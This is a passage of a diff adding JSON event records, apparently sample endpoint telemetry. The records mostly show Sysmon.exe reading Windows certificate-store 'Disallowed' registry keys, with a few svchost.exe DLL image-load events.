"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WsmSvc.dll", + "image_path": "C:\\Windows\\System32\\WsmSvc.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881520000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", 
+ "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + 
}, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "dsrole.dll", + "image_path": "C:\\Windows\\System32\\dsrole.dll", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883570879960000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570881680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + 